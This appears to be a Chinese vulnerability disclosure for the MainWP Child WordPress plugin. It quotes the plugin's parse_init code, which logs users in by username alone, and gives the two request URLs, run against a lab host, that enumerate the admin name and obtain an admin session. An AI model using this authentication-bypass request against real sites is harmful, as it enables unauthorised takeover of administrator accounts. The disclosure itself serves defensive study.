<p>/class/MainWPChild.class.php</p><pre class=""> $this->posts_where_suffix = '';
$this->comments_and_clauses = '';
add_action('template_redirect', array($this, 'template_redirect'));
add_action('init', array(&$this, 'parse_init'));
add_action('admin_menu', array(&$this, 'admin_menu'));
add_action('admin_init', array(&$this, 'admin_init'));
add_action('init', array(&$this, 'localization'));
……
function parse_init()
{
global $current_user; //wp variable
//Login the user
if (isset($_REQUEST['login_required']) && ($_REQUEST['login_required'] == 1) && isset($_REQUEST['user']))
{
$username = rawurldecode($_REQUEST['user']);
if (is_user_logged_in())
{
global $current_user;
if ($current_user->wp_user_level != 10 && (!isset($current_user->user_level) || $current_user->user_level != 10) && !current_user_can('level_10'))
{
do_action('wp_logout');
}
}
if (!is_user_logged_in() || $username != $current_user->user_login)
{
if (!$this->login($username))
{
return;
}
</pre><p>当初始化时调用parse_init方法。当用户传入用户名的时候,只验证了用户名就登陆了,导致当攻击者获取到网站管理员的用户名后可以登录任意用户。<br></p><p>首先访问目标站点获取管理员登录名:</p><pre class="">http://10.211.55.3/wordpress?author=1</pre><p>利用登录名拼接URL:</p><pre class="">http://10.211.55.3/wordpress/wp-admin/admin-ajax.php?action=init&login_required=1&user=admin</pre><p>通过浏览器访问,发现已经返回Set-Cookie头。</p><p> </p><p><img alt="0AB88841-E5EB-4D6C-B54C-19F2F6027C89.png" src="https://images.seebug.org/@/uploads/1434002730976-0AB88841-E5EB-4D6C-B54C-19F2F6027C89.png" data-image-size="1302,758"><br></p><p>访问后台,已经成功登录:</p><pre class="">http://10.211.55.3/wordpress/wp-admin/</pre><p> </p><p><img alt="5FC75DDB-C31D-4FFA-9234-51A646516A05.png" src="https://images.seebug.org/@/uploads/1434002755702-5FC75DDB-C31D-4FFA-9234-51A646516A05.png" data-image-size="1378,630"><br></p>
京公网安备 11010502034610号
暂无评论